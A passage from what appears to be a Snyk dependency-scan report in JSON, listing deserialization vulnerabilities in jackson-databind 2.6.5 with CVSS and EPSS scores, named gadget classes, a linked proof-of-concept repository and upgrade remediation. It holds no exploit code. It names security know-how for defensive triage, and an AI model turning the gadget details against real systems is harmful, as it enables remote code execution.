\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + 
"type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + 
